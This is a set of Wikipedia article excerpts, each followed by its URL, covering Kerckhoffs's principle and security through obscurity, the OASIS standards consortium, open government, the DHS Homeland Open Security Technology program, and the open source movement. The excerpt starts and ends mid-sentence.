brittleness—and therefore something likely to make a system prone to catastrophic collapse. Conversely, openness provides ductility.[11] Any security system depends crucially on keeping some things secret. However, Kerckhoffs's principle points out that the things kept secret ought to be those least costly to change if inadvertently disclosed.[9] For example, a cryptographic algorithm may be implemented by hardware and software that is widely distributed among users. If security depends on keeping that secret, then disclosure leads to major logistic difficulties in developing, testing, and distributing implementations of a new algorithm – it is "brittle". On the other hand, if keeping the algorithm secret is not important, but only thekeysused with the algorithm must be secret, then disclosure of the keys simply requires the simpler, less costly process of generating and distributing new keys.[12] In accordance with Kerckhoffs's principle, the majority of civilian cryptography makes use of publicly known algorithms. By contrast, ciphers used to protect classified government or military information are often kept secret (seeType 1 encryption). However, it should not be assumed that government/military ciphers must be kept secret to maintain security. It is possible that they are intended to be as cryptographically sound as public algorithms, and the decision to keep them secret is in keeping with a layered security posture. It is moderately common for companies, and sometimes even standards bodies as in the case of theCSS encryption on DVDs, to keep the inner workings of a system secret. Some[who?]argue this "security by obscurity" makes the product safer and less vulnerable to attack. A counter-argument is that keeping the innards secret may improve security in the short term, but in the long run, only systems that have been published and analyzed should be trusted. Steven BellovinandRandy Bushcommented:[13] Security Through Obscurity Considered Dangerous Hiding security vulnerabilities in algorithms, software, and/or hardware decreases the likelihood they will be repaired and increases the likelihood that they can and will be exploited. Discouraging or outlawing discussion of weaknesses and vulnerabilities is extremely dangerous and deleterious to the security of computer systems, the network, and its citizens. Open Discussion Encourages Better Security The long history of cryptography and cryptoanalysis has shown time and time again that open discussion and analysis of algorithms exposes weaknesses not thought of by the original authors, and thereby leads to better and more secure algorithms. As Kerckhoffs noted about cipher systems in 1883 [Kerc83], "Il faut qu'il n'exige pas le secret, et qu'il puisse sans inconvénient tomber entre les mains de l'ennemi." (Roughly, "the system must not require secrecy and must be able to be stolen by the enemy without causing trouble.")
https://en.wikipedia.org/wiki/Kerckhoffs%27s_Principle
TheOrganization for the Advancement of Structured Information Standards(OASIS;/oʊˈeɪ.sɪs/) is anonprofitconsortiumthat works on the development, convergence, and adoption of projects - bothopen standardsandopen source- forcomputer security,blockchain,Internet of things(IoT),emergency management,cloud computing,legal data exchange,energy,content technologies, and other areas.[2] OASIS was founded under the name "SGML Open" in 1993. It began as a trade association of Standard Generalized Markup Language (SGML) tool vendors to cooperatively promote the adoption of SGML through mainly educational activities, though some amount of technical activity was also pursued including an update of theCALS Table Modelspecification and specifications for fragment interchange and entity management.[3] In 1998, with the movement of the industry toXML, SGML Open changed its emphasis from SGML to XML, and changed its name to OASIS Open to be inclusive of XML and reflect an expanded scope of technical work and standards. The focus of the consortium's activities also moved from promoting adoption (as XML was getting much attention on its own) to developing technical specifications. In July 2000 a new technical committee process was approved. With the adoption of the process the manner in which technical committees were created, operated, and progressed their work was regularized. At the adoption of the process there were five technical committees; by 2004 there were nearly 70[citation needed]. During 1999, OASIS was approached byUN/CEFACT, the committee of theUnited Nationsdealing with standards for business, to jointly develop a new set of specifications for electronic business. The joint initiative, called "ebXML" and which first met in November 1999, was chartered for a three-year period. At the final meeting under the original charter, in Vienna, UN/CEFACT and OASIS agreed to divide the remaining work between the two organizations and to coordinate the completion of the work through a coordinating committee. In 2004 OASIS submitted its completed ebXML specifications toISOTC154 where they were approved asISO 15000. The consortium has its headquarters inWoburn, Massachusetts, shared with other companies. In December 2020, OASIS moved to its current location, 400 TradeCenter Drive. Previous office locations include 25 Corporate Drive Suite 103 and 35 Corporate Drive, Suite 150, both in Burlington, MA.[4] The following standards are under development or maintained by OASIS technical committees: Adhesion to the consortium requires some fees to be paid, which must be renewed annually, depending on the membership category adherents want to access.[6]Among the adherents are members fromDell,IBM,ISO/IEC,Cisco Systems,KDE e.V.,Microsoft,Oracle,Red Hat,The Document Foundation, universities, government agencies, individuals and employees from other less-known companies.[7][8] Member sections are special interest groups within the consortium that focus on specific topics. These sections keep their own distinguishable identity and have full autonomy to define their work program and agenda.[9]The integration of the member section in the standardization process is organized via the technical committees. Active member sections are for example: Member sections may be completed when they have achieved their objectives. The standards that they promoted are then maintained by the relevant technical committees directly within OASIS. For example: Like many bodies producingopen standardse.g.ECMA,[10]OASIS added aReasonable and non-discriminatory licensing(RAND) clause to its policy in February 2005.[8]That amendment required participants todiscloseintent to apply forsoftware patentsfor technologies under consideration in the standard. Contrary to theW3C, which requires participants to offerroyalty-freelicensesto anyone using the resulting standard, OASIS offers a similar Royalty Free on Limited Terms mode, along with a Royalty Free on RAND Terms mode and a RAND (reasonable and non-discriminatory) mode for its committees. Compared to W3C, OASIS is less restrictive regarding obligation to companies to grant a royalty-free license to the patents they own.[11] Controversy has rapidly arisen[12]because this licensing was added silently and allows publication of standards which could require licensing fee payments to patent holders. This situation could effectively eliminate the possibility offree/open sourceimplementations of these standards. Further, contributors could initially offer royalty-free use of their patent, later imposing per-unit fees, after the standard has been accepted. On April 11, 2005,The New York TimesreportedIBMcommitted, for free, all of its patents to the OASIS group.[13]Larry Rosen, a software law expert and the leader of the reaction which rose up when OASIS quietly included a RAND clause in its policy, welcomed the initiative and supposed OASIS will not continue using that policy as other companies involved would follow. The RAND policy has still not been removed and other commercial companies have not published such a free statement towards OASIS.[citation needed] Patrick Gannon, president and CEO of OASIS from 2001 to 2008,[14]minimized the risk that a company could take advantage of a standard to request royalties when it has been established, saying "If it's an option nobody uses, then what's the harm?"[citation needed]. Sam Hiser, former marketing lead of the now defunctOpenOffice.org, explained that such patents towards an open standard are counterproductive and inappropriate. He also argued thatIBMandMicrosoftwere shifting their standardization efforts from theW3Cto OASIS, in a way to leverage probably their patents portfolio in the future. Hiser also attributed this RAND change to the OASIS policy to Microsoft.[15] The RAND term could indeed allow any company involved to leverage their patent in the future, but that amendment was probably added in a way to attract more companies to the consortium, and encourage contributions from potential participants.[opinion]Big actors like Microsoft could have indeed applied pressure and made a sine-qua-non condition to access the consortium, and possibly jeopardize/boycott the standard if such a clause was not present. Doug Mahugh — while working for Microsoft (a promoter ofOffice Open XML, a Microsoft document format competing with OASIS'sISO/IEC 26300, i.e. ODF v1.0) — claimed that "many countries have expressed frustration about the pace of OASIS's responses to defect reports that have been submitted on ISO/IEC 26300 and the inability forSC 34members to participate in the maintenance of ODF."[16]However, Rob Weir, co-chair of the OASISODFTechnical Committee noted that at the time, "the ODF TC had received zero defect reports from any ISO/IEC national body other than Japan". He added that the submitter of the original Japanese defect report, Murata Mokoto, was satisfied with the preparation of the errata.[17]He also self-published a blog post blaming Microsoft of involving people to improve and modify the accuracy of ODF and OpenXML Wikipedia articles.[18]
https://en.wikipedia.org/wiki/OASIS_(organization)
Open governmentis the governingdoctrinewhich maintains that citizens have the right to access the documents and proceedings of the government to allow for effective public oversight.[1]In its broadest construction, it opposesreason of stateand other considerations which have tended to legitimize extensive statesecrecy. The origins of open-government arguments can be dated to the time of the EuropeanAge of Enlightenment, when philosophers debated the proper construction of a then nascentdemocratic society. It is also increasingly being associated with the concept of democratic reform.[2]The United NationsSustainable Development Goal 16for example advocates for public access to information as a criterion for ensuring accountable and inclusive institutions.[3] The concept of open government is broad in scope but is most often connected to ideas of government transparency, participation and accountability. Transparency is defined as the visibility and inferability of information,[4]accountability as answerability and enforceability,[5]and participation is often graded along the "ladder of citizen participation."[6]Harlan Yu and David G. Robinson specify the distinction betweenopen dataand open government in their paper "The New Ambiguity of "Open Government". They define open government in terms of service delivery and public accountability. They argue that technology can be used to facilitate disclosure of information, but that the use of open data technologies does not necessarily equate accountability.[7] TheOrganisation for Economic Co-operation and Development(OECD) approaches open government through the following categories: whole of government coordination, civic engagement and access to information, budget transparency, integrity and the fight against corruption, use of technology, and local development.[8] The term 'open government' originated in theUnited Statesafter World War II. Wallace Parks, who served on a subcommittee on Government Information created by the U.S. Congress, introduce the term in his 1957 article "The Open Government Principle: Applying the Right to Know under the Constitution". After this and after the passing of theFreedom of Information Act(FOIA) in 1966, federal courts began using the term as a synonym for government transparency.[7] Although this was the first time that 'open government' was introduced the concept of transparency and accountability in government can be traced back toAncient Greecein fifth century B.C.E. Athens where different legal institutions regulated the behavior of officials and offered a path for citizens to express their grievances towards them. One such institution, the euthyna, held officials to a standard of "straightness" and enforced that they give an account in front of an Assembly of citizens about everything that they did that year.[9] In more recent history, the idea that government should be open to public scrutiny and susceptible topublic opiniondates back to the time of theEnlightenment, when manyphilosophesmade an attack onabsolutistdoctrines of state secrecy.[10][11]The passage of formal legislature can also be traced to this time withSweden, (which then includedFinlandas a Swedish-governed territory) where free press legislation was enacted as part of its constitution (Freedom of the PressAct, 1766).[12] Influenced by Enlightenment thought, the revolutions in United States (1776) and France (1789), enshrined provisions and requirements for public budgetary accounting andfreedom of the pressin constitutional articles. In the nineteenth century, attempts byMetternicheanstatesmen to row back on these measures were vigorously opposed by a number of eminent liberal politicians and writers, includingJeremy Bentham,John Stuart MillandJohn Dalberg-Acton, 1st Baron Acton. Open government is widely seen to be a key hallmark of contemporarydemocraticpractice and is often linked to the passing offreedom of informationlegislation. Scandinavian countries claim to have adopted the first freedom of information legislation[citation needed], dating the origins of its modern provisions to the eighteenth century[citation needed]and Finland continuing the presumption of openness after gaining independence in 1917, passing its Act on Publicity of Official Documents in 1951 (superseded by new legislation in 1999). An emergent development also involves the increasing integration of software and mechanisms that allow citizens to become more directly involved in governance, particularly in the area of legislation.[13]Some refer to this phenomenon ase-participation, which has been described as "the use of information and communication technologies to broaden and deepen political participation by enabling citizens to connect with one another and with their elected representatives".[14] Morocco's new constitution of 2011, outlined several goals the government wishes to achieve in order to guarantee the citizens right to information.[15]The world has been offering support to the government in order to enact these reforms through the Transparency and Accountability Development Policy Loan (DPL). This loan is part of a joint larger program between the European Union and the African Development Bank to offer financial and technical support to governments attempting to implement reforms.[16] As of 2010, section 35 of Kenya's constitution ensures citizens' rights to government information. The article states "35.(1) Every citizen has the right of access to — (a) information held by the State; and (b) information held by another person and required for the exercise or protection of any right or fundamental freedom ... (3) The State shall publish and publicize any important information affecting the nation." Important government data is now freely available through the Kenya Open Data Initiative.[17] Taiwanstarted its e-government program in 1998 and since then has had a series of laws and executive orders to enforce open government policies. The Freedom of Government Information Law of 2005, stated that all government information must be made public. Such information includes budgets, administrative plans, communication of government agencies, subsidies. Since then it released its open data platform,data.gov.tw. TheSunflower Movementof 2014, emphasized the value that Taiwanese citizens place on openness and transparency. A white paper published by the National Development Council with policy goals for 2020 explores ways to increase citizen participation and use open data for further government transparency.[18] ThePhilippinespassed the Freedom of Information Order in 2016, outlining guidelines to practice government transparency and full public disclosure.[19]In accordance with its General Appropriations Act of 2012, the Philippine government requires government agencies to display a "transparency seal" on their websites, which contains information about the agency's functions, annual reports, officials, budgets, and projects.[20] TheRight to Information(RTI) movement in India, created the RTI law in 2005 after environmental movements demanded the release of information regarding environmental deterioration due to industrialization.[21]Another catalyst for the RTI law and other similar laws in southeast Asia, may have been due to multilateral agencies offering aid and loans in exchange for more transparency or "democratic" policies.[22][23] In October 2023, Iranian government publicly opposed measure "tritary branches of judiciary, executive, legislative transparency program". The transparency law never passes after nine months as judiciary and state did not consent.[24][25]The government has the Iranfoia website for requests.[26] In the Netherlands, large social unrest and the growing influence of televisions in the 1960s led to a push for more government openness. Access to information legislation was passed in 1980; since then, further emphasis has been placed on measuring the performance of government agencies.[27] Transparency as a legal principle underpinsEuropean Union law, for example in regard to the quality of the drafting of legislation,[28]and as a principle to be exercised withingovernment procurementprocedures. European law academics argued in 2007 that a "new legal principle", transparency, might be emerging "in gestation" within EU law.[29] The government of the Netherlands adopted an Open Government in Action (Open overheid in actie) Plan for 2016–2017, which outlines nine concrete commitments to the open government standards set by the OECD.[30] Since 2018, inWales, theWelsh Governmenthas funded the training ofWikipediaskills in secondary schools, as part of theWelsh Baccalaureateand uses an open licence on all published videos and other content. In 2009, President Obama released a memorandum on transparency and open government and started theOpen Government Initiative. In his memorandum put forward his administration's goal to strengthen democracy through a transparent, participatory and collaborative government.[31]The initiative has goals of a transparent and collaborative government, in which to end secrecy in Washington, while improving effectiveness through increased communication between citizens and government officials.[32]Movements for government transparency in recent United States history started in the 1950s after World War II because federal departments and agencies had started limiting information availability as a reaction to global hostilities during the war and due to fear of Cold War spies. Agencies were given the right to deny access to information "for good cause found" or "in the public interest". These policies made it difficult for congressional committees to get access to records and documents, which then led to explorations of possible legislative solutions.[33] Since the early 2000s, transparency has been an important part of Latin America's efforts to professionalize government and fight corruption. All countries in the region have enacted freedom of information laws, beginning with Mexico, Peru, and Panama in 2002.[34][35]Chile's Anti-Corruption and Probity Agenda and State Modernization Agenda. In 2008, Chile passed the Transparency Law has led to further open government reforms.[36]Chile published its open government action plan for 2016–18 as part of its membership of the Open Government Partnership (OGP).[37] Transparency has been described as the visibility and inferability of information, defined by complete and findable information, which leads to accurate conclusions.[4]It has two principal manifestations, monitoring transparency and consultation or collaboration transparency. It holds importance in more modern discussions because of its presence in new public management.[38]For transparency to work, the idea goes beyond government involvement and must include public trust. Transparency in government has three main aspects. First, budgetary information must be viewable by the public. Second, there must be an effective way to make and enforce laws.[38]Last, non-government organizations and a form of independent media must be at the center for public use.[38]With transparency, there are also factors for data disclosure, such as timeliness, quality, and access and visibility.[39]Data disclosure is important for transparency because it increases public understanding of governmental practices and is the goal of open government. However, there are arguments for both sides of transparency that must be considered. Transparency in government is often credited with generating governmentaccountability, which supporters argue leads to reduction ingovernment corruption,briberyand othermalfeasance.[40]This is mentioned later and discussed as accountability with transparency. Some commentators contend that an open, transparent government allows for the dissemination of information, which in turn helps produce greater knowledge and societal progress.[40]Organizations supporting transparency policies such as theOECDand theOpen Government Partnershipclaim that open government reforms can also lead to increased trust in government,[41][42]although there is mixed evidence to support these claims, with increased transparency sometimes leading to reduced trust in government.[43][44][45][46][47] Public opinion can also be shifted when people have access to see the result of a certain policy. The United States government has at times forbid journalists to publish photographs of soldiers' coffins,[48]an apparent attempt to manage emotional reactions that might heighten public criticism of ongoing wars; nonetheless, many believe that emotionally charged images can be valuable information. Similarly, some opponents of the death penalty have argued that executions should be televised so the public can "see what is being done in their name and with their tax dollars."[49] Government transparency is beneficial for efficient democracy, as information helps citizens form meaningful conclusions about upcoming legislation and vote for them in the next election.[50]According to theCarnegie Endowment for International Peace, greater citizen participation in government is linked to government transparency.[51] Advocates of open government often argue thatcivil society, rather than governmentlegislation, offers the best route to more transparent administration. They point to the role ofwhistleblowersreporting from inside the government bureaucracy (individuals likeDaniel EllsbergorPaul van Buitenen). They argue that an independent and inquiring press, printed or electronic, is often a stronger guarantor of transparency than legislative checks and balances.[52][53] The contemporary doctrine of open government finds its strongest advocates innon-governmental organizationskeen to counter what they see as the inherent tendency of government to lapse, whenever possible, into secrecy. Prominent among these NGOs are bodies likeTransparency Internationalor theOpen Society Institute. They argue that standards of openness are vital to the ongoing prosperity and development of democratic societies. Government indecision, poor performance andgridlockare among the risks of government transparency, according to some critics.[54]Political commentatorDavid Frumwrote in 2014 that, "instead of yielding more accountability, however, these reforms [transparency reforms] have yielded more lobbying, more expense, more delay, and more indecision."[55]Jason Grumet argues that government officials cannot properly deliberate, collaborate and compromise when everything they are doing is being watched.[56]Arandomized controlled trialconducted with 463 delegates of theNational Assemblyof Vietnam showed that increased transparency of the legislative proceedings, such as debates and query transcripts, curtailed delegates activity in the query sessions, avoiding taking part in activities that could embarrass leaders of the Vietnamese regime.[57] Privacy is another concern. Citizens may incur "adverse consequences, retribution or negative repercussions"[1]from information provided by governments. Teresa Scassa, a law professor at the University of Ottawa, outlined three main possible privacy challenges in a 2014 article. First is the difficulty of balancing further transparency of government, while also protecting the privacy of personal information, or information about identifiable individuals that is in the hands of the government. Second is dealing with distinctions between data protection regulations between private and public sector actors because governments may access information collected by private companies which are not controlled by as stringent laws. Third is the release of "Big data", which may appear anonymized can be reconnected to specific individuals using sophisticated algorithms.[58] Intelligence gathering, especially to identify violent threats (whether domestic or foreign), must often be done clandestinely. Frum wrote in 2014 that "the very same imperatives that drive states to collect information also require them to deny doing so. These denials matter even when they are not believed."[59] Moral certitude undergirds much transparency advocacy, but a number of scholars question whether it is possible for us to have that certitude. They have also highlighted how transparency can support certain neoliberal imperatives.[60] Concerns have also been raised in the election administration community about the use of excessive Freedom of Information Act requests as a tactic ofelection deniersto disrupt the functioning of local and county election offices. Often unreasonably broad, repetitive, or based on misinformation, the high volume of requests has led to what a Colorado official said amounts to "adenial-of-service attackon local government." Local election officials in Florida and Michigan have reported spending 25-70% of staff time in recent years on processing public records requests.[61] A review of recent state laws by the Center for Election Innovation & Research found at least 13 states that have sought to protect election staff from the abuse of FOIA requests in several ways, such as creating publicly accessible databases that do not require staff assistance and giving election staff the authority to deny unreasonable or clearly frivolous requests.[61] Accountabilityfocuses on promoting transparency and allowing the public to understand the actions of their government.[62]Public officials are expected to share details about how public resources are used and what their objectives are.[39]Accountability in open government reduces corruption and increases transparency. However, it is important to note that there is transparency with and without accountability in open government. Transparency without accountability is often more difficult to monitor and there is less responsibility needed from the government. Transparency with accountability has proven to be more effective as a trustworthy relationship can be built between government agencies and people governed by them.[62]The argument with or without transparency was mentioned previously and highlights major issues such as losing governmental trust or privacy issues with accountability. Some governments have created portals in order to allow people to see critical data and improve accountability and transparency.[39]Not all data released on these portals is relevant and easily accessible meaning transparency is not always easily attainable. For example, Given the criteria for valuable information, governments should look for quality, completeness, timeliness, and usability when releasing important information that shows transparency and supports accountability.[39] Accountability in open government establishes the presence of transparency within governments.[38]Accountability and transparency work to promote open government in democracies. Through organizations such asthe Open Government Partnership(OGP) within the United States, which was established by the U.S.Department of State, there have been efforts to enhance democracies through both accountability and transparency.[62]These efforts reach beyond the scope of North America and even into some Latin American and Asian countries. Promoting open government in Latin American countries has increased public trust and reduced corruption.[63]Latin American countries were among those included in the OGP plan promoted by the United States in the Obama Administration.[63]Additionally, in Asia, there has been a push towards right to information (RTI) to help build accountability.[64]However, these measures in countries have shown open government measures are not one size fits all. They can fail and have to be tweaked for each region and there must be awareness from the public to demand accountability to ensure they receive it from the government.[64] Most of the relationship helps strengthen transparency in governments through the means of accountability.[38]Transparency acts as the vision for open government, allowing the public to have quality access to government records and data.[65]This open access forces governments to be more accountable as they cannot hide corruption with transparency. There can be transparency without accountability, which allows the government to choose which data is of significant value to be released to the public.[66]This does not solve the lack of accountability and highlights the necessity of transparency with accountability. With both transparency and accountability, there must be regulations in place to make agencies justify why they are relinquishing certain information along with strict enforcement to ensure all transparency measures are fulfilled.[67] Governments and organizations are using new technologies as a tool for increased transparency. Examples include use ofopen dataplatforms to publish information online and the theory ofopen source governance. Open government data (OGD), a term which refers specifically to the public publishing of government datasets,[68]is often made available through online platforms such as data.gov.uk or www.data.gov. Proponents of OGD argue that easily accessible data pertaining to governmental institutions allows for further citizen engagement within political institutions.[69]OGD principles require that data is complete, primary, timely, accessible, machine processable, non-discriminatory, non-proprietary, and license free.[70] Public and private sector platforms provide an avenue for citizens to engage while offering access to transparent information that citizens have come to expect. Numerous organizations have worked to consolidate resources for citizens to access government (local, state and federal) budget spending, stimulus spending, lobbyist spending, legislative tracking, and more.[71]
https://en.wikipedia.org/wiki/Open_government
Homeland Open Security Technology(HOST) is a five-year, $10 million program by theDepartment of Homeland Security'sScience and Technology Directorateto promote the creation and use ofopen securityandopen-source softwarein the United States government and military, especially in areas pertaining tocomputer security.[1][2][3][4] Proponent David A. Wheeler claims that open-source security could also extend to hardware and written documents.[5][6]In October 2011, the project won theOpen Source for America2011 Government Deployment Open Source Award.[7] The project is contracted to the Open Technology Research Consortium which consists of theGeorgia Tech Research Institute(primary), the Center for Agile Technology at theUniversity of Texas at Austin, theOpen Source Software Institute, and theOpen Information Security Foundation.[8][9][10]The project has contributed funding towards theOpenSSL Software Foundationand the Open Information Security Foundation.[11][12] In October 2012, HOST hosted the Open Cybersecurity Summit in Washington, D.C.; it was a one-day summit with a keynote byStewart A. Baker, former Assistant Secretary for Policy of the Department of Homeland Security.[13][14][15]
https://en.wikipedia.org/wiki/Homeland_Open_Security_Technology
Open sourceissource codethat is made freely available for possible modification and redistribution. Products include permission to use and view the source code,[1]design documents,[2]or content of the product. Theopen source modelis a decentralized software development model that encourages open collaboration.[3][4]A main principle ofopen source softwaredevelopment is peer production, with products such assource code, blueprints, and documentation freely available to the public. The open source movement in software began as a response to the limitations of proprietary code. The model is used for projects such as in open source appropriate technology,[5]and open source drug discovery.[6][7] Open source promotes universal access via an open-source or free license to a product's design or blueprint, and universal redistribution of that design or blueprint.[8][9]Before the phraseopen sourcebecame widely adopted, developers and producers used a variety of other terms, such asfree software,shareware, andpublic domain software.Open sourcegained hold with the rise of theInternet.[10]The open-source software movement arose to clarify copyright, licensing, domain, and consumer issues. Generally, open source refers to acomputer programin which the source code is available to the general public for usage, modification from its original design, and publication of their version (fork) back to the community. Many large formal institutions have sprung up to support the development of the open-source movement, including the Apache Software Foundation, which supports community projects such as the open-source framework and the open-sourceHTTPserver Apache HTTP. The sharing of technical information predates the Internet and the personal computer considerably. For instance, in the early years of automobile development a group of capitalmonopolistsowned the rights to a2-cyclegasoline-engine patent originally filed byGeorge B. Selden.[11]By controlling this patent, they were able to monopolize the industry and force car manufacturers to adhere to their demands, or risk a lawsuit. In 1911, independent automakerHenry Fordwon a challenge tothe Selden patent. The result was that the Selden patent became virtually worthless and a new association (which would eventually become the Motor Vehicle Manufacturers Association) was formed.[11]The new association instituted a cross-licensing agreement among all US automotive manufacturers: although each company would develop technology and file patents, these patents were shared openly and without the exchange of money among all the manufacturers.[11]By the time the US enteredWorld War II, 92 Ford patents and 515 patents from other companies were being shared among these manufacturers, without any exchange of money (or lawsuits).[11] Early instances of the free sharing of source code includeIBM's source releases of itsoperating systemsand other programs in the 1950s and 1960s, and theSHAREuser group that formed to facilitate the exchange of software.[12][13]Beginning in the 1960s,ARPANETresearchers used an open "Request for Comments" (RFC) process to encourage feedback in early telecommunication network protocols. This led to the birth of the early Internet in 1969. The sharing of source code on the Internet began when the Internet was relatively primitive, with software distributed viaUUCP,Usenet,IRC, andGopher.BSD, for example, was first widely distributed by posts to comp.os.linux on the Usenet, which is also where its development was discussed.Linuxfollowed in this model. Open source as a term emerged in the late 1990s by a group of people in the free software movement who were critical of the political agenda and moral philosophy implied in the term "free software" and sought to reframe the discourse to reflect a more commercially minded position.[14]In addition, the ambiguity of the term "free software" was seen as discouraging business adoption.[15][16]However, the ambiguity of the word "free" exists primarily in English as it can refer to cost. The group includedChristine Peterson, Todd Anderson,Larry Augustin,Jon Hall,Sam Ockman,Michael TiemannandEric S. Raymond. Peterson suggested "open source" at a meeting[17]held atPalo Alto, California, in reaction toNetscape's announcement in January 1998 of a source code release forNavigator.[18]Linus Torvaldsgave his support the following day, and Phil Hughes backed the term inLinux Journal. Richard Stallman, the founder of the Free Software Foundation (FSF) in 1985, quickly decided against endorsing the term.[17][19]The FSF's goal was to promote the development and use of free software, which they defined as software that grants users the freedom to run, study, share, and modify the code. This concept is similar to open source but places a greater emphasis on the ethical and political aspects of software freedom. Netscape released its source code under the Netscape Public License and later under theMozilla Public License.[20] Raymond was especially active in the effort to popularize the new term. He made the first public call to the free software community to adopt it in February 1998.[21]Shortly after, he founded The Open Source Initiative in collaboration withBruce Perens.[17] The term gained further visibility through an event organized in April 1998 by technology publisherO'Reilly Media. Originally titled the "Freeware Summit" and later known as the "Open Source Summit",[22]the event was attended by the leaders of many of the most important free and open-source projects, including Linus Torvalds, Larry Wall, Brian Behlendorf, Eric Allman, Guido van Rossum, Michael Tiemann, Paul Vixie, Jamie Zawinski, and Eric Raymond. At that meeting, alternatives to the term "free software" were discussed. Tiemann argued for "sourceware" as a new term, while Raymond argued for "open source." The assembled developers took a vote, and the winner was announced at a press conference the same evening.[22] Some economists agree that open-source is aninformation good[24]or "knowledge good" with original work involving a significant amount of time, money, and effort. The cost of reproducing the work is low enough that additional users may be added at zero or near zero cost – this is referred to as themarginal costof a product.Copyrightcreates a monopoly so that the price charged to consumers can be significantly higher than the marginal cost of production. This allows the author to recoup the cost of making the original work. Copyright thus creates access costs for consumers who value the work more than the marginal cost but less than the initial production cost. Access costs also pose problems for authors who wish to create aderivative work—such as a copy of a software program modified to fix a bug or add a feature, or aremixof a song—but are unable or unwilling to pay the copyright holder for the right to do so. Being organized as effectively a "consumers' cooperative", open source eliminates some of the access costs of consumers and creators of derivative works by reducing the restrictions of copyright. Basic economic theory predicts that lower costs would lead to higher consumption and also more frequent creation of derivative works. Organizations such asCreative Commonshost websites where individuals can file for alternative "licenses", or levels of restriction, for their works.[25]These self-made protections free the general society of the costs of policing copyright infringement. Others argue that since consumers do not pay for their copies, creators are unable to recoup the initial cost of production and thus have little economic incentive to create in the first place. By this argument, consumers would lose out because some of the goods they would otherwise purchase would not be available. In practice, content producers can choose whether to adopt a proprietary license and charge for copies, or an open license. Some goods which require large amounts of professional research and development, such as thepharmaceutical industry(which depends largely on patents, not copyright for intellectual property protection) are almost exclusively proprietary, although increasingly sophisticated technologies are being developed on open-source principles.[26] There is evidence that open-source development creates enormous value.[27]For example, in the context ofopen-source hardwaredesign, digital designs are shared for free and anyone with access to digital manufacturing technologies (e.g.RepRap3D printers) can replicate the product for the cost of materials.[28]The original sharer may receive feedback and potentially improvements on the original design from thepeer productioncommunity. Many open-source projects have a high economic value. According to the Battery Open Source Software Index (BOSS), the ten economically most important open-source projects are:[29][30] The rank given is based on the activity regarding projects in online discussions, on GitHub, on search activity in search engines and on the influence on the labour market. Alternative arrangements have also been shown to result in good creation outside of the proprietary license model. Examples include:[citation needed] The open-source model is a decentralizedsoftware developmentmodel that encouragesopen collaboration,[3][33]meaning "any system of innovation or production that relies on goal-oriented yet loosely coordinated participants who interact to create a product (or service) of economic value, which they make available to contributors and noncontributors alike."[3]A main principle ofopen-source software developmentispeer production, with products such as source code,blueprints, and documentation freely available to the public. The open-source movement in software began as a response to the limitations of proprietary code. The model is used for projects such as inopen-source appropriate technology,[5]and open-source drug discovery.[6][7] The open-source model for software development inspired the use of the term to refer to other forms of open collaboration, such as inInternet forums,[8]mailing lists[34]andonline communities.[35]Open collaboration is also thought to be the operating principle underlining a gamut of diverse ventures, includingTEDxand Wikipedia.[36] Open collaboration is the principle underlyingpeer production,mass collaboration, andwikinomics.[3]It was observed initially in open-source software, but can also be found in many other instances, such as inInternet forums,[8]mailing lists,[34]Internet communities,[35]and many instances ofopen content, such asCreative Commons. It also explains some instances ofcrowdsourcing,collaborative consumption, andopen innovation.[3] Riehle et al. define open collaboration as collaboration based on three principles ofegalitarianism,meritocracy, andself-organization.[37]Levine and Prietula define open collaboration as "any system of innovation or production that relies on goal-oriented yet loosely coordinated participants who interact to create a product (or service) of economic value, which they make available to contributors and noncontributors alike."[3]This definition captures multiple instances, all joined by similar principles. For example, all of the elements – goods of economic value, open access to contribute and consume, interaction and exchange, purposeful yet loosely coordinated work – are present in an open-source software project, in Wikipedia, or in a user forum or community. They can also be present in a commercial website that is based onuser-generated content. In all of these instances of open collaboration, anyone can contribute and anyone can freely partake in the fruits of sharing, which are produced by interacting participants who are loosely coordinated. An annual conference dedicated to the research and practice of open collaboration is the International Symposium on Wikis and Open Collaboration (OpenSym, formerly WikiSym).[38]As per its website, the group defines open collaboration as "collaboration that is egalitarian (everyone can join, no principled or artificial barriers to participation exist), meritocratic (decisions and status are merit-based rather than imposed) and self-organizing (processes adapt to people rather than people adapt to pre-defined processes)."[39] Open source promotes universal access via anopen-sourceorfree licenseto a product's design or blueprint, and universal redistribution of that design or blueprint.[8][9]Before the phraseopen sourcebecame widely adopted, developers and producers used a variety of other terms.Open sourcegained hold in part due to the rise of the Internet.[40]Theopen-source software movementarose to clarifycopyright,licensing,domain, and consumer issues. An open-source license is a type oflicensefor computer software and other products that allows thesource code, blueprint or design to be used, modified or shared (with or without modification) under defined terms and conditions.[41][42]This allows end users and commercial companies to review and modify the source code, blueprint or design for their own customization, curiosity or troubleshooting needs. Open-source licensed software is mostly availablefreeof charge, though this does not necessarily have to be the case. Licenses which only permit non-commercial redistribution or modification of the source code for personal use only are generally not considered as open-source licenses. However, open-source licenses may have some restrictions, particularly regarding the expression of respect to the origin of software, such as a requirement to preserve the name of the authors and a copyright statement within the code, or a requirement to redistribute the licensed software only under the same license (as in acopyleftlicense). One popular set ofopen-source softwarelicenses are those approved by the Open Source Initiative (OSI) based on theirOpen Source Definition(OSD). Social and political views have been affected by the growth of the concept of open source. Advocates in one field often support the expansion of open source in other fields. ButEric Raymondand other founders of theopen-source movementhave sometimes publicly argued against speculation about applications outside software, saying that strong arguments for software openness should not be weakened by overreaching into areas where the story may be less compelling. The broader impact of the open-source movement, and the extent of its role in the development of new information sharing procedures, remain to be seen. Theopen-source movementhas inspired increasedtransparencyand liberty inbiotechnologyresearch, for exampleCAMBIA[43]Even the research methodologies themselves can benefit from the application of open-source principles.[44]It has also given rise to the rapidly-expandingopen-source hardwaremovement. Open-source softwareis software which source code is published and made available to the public, enabling anyone to copy, modify and redistribute the source code without paying royalties or fees.[45] LibreOfficeand theGNU Image Manipulation Programare examples of open source software. As they do with proprietary software, users must accept the terms of a license when they use open source software—but the legal terms of open source licenses differ dramatically from those of proprietary licenses. Open-source code can evolve through community cooperation. These communities are composed of individual programmers as well as large companies. Some of the individual programmers who start an open-source project may end up establishing companies offering products or services incorporating open-source programs.[citation needed]Examples of open-source software products are:[46] TheGoogle Summer of Code, often abbreviated to GSoC, is an international annual program in which Google awards stipends to contributors who successfully complete a free and open-source software coding project during the summer. GSoC is a large scale project with 202 participating organizations in 2021.[47]There are similar smaller scale projects such as the Talawa Project[48]run by thePalisadoes Foundation(a non profit based in California, originally to promote the use of information technology in Jamaica, but now also supporting underprivileged communities in the US)[49] Open-source hardwareis hardware which initial specification, usually in a software format, is published and made available to the public, enabling anyone to copy, modify and redistribute the hardware and source code without paying royalties or fees. Open-source hardware evolves through community cooperation. These communities are 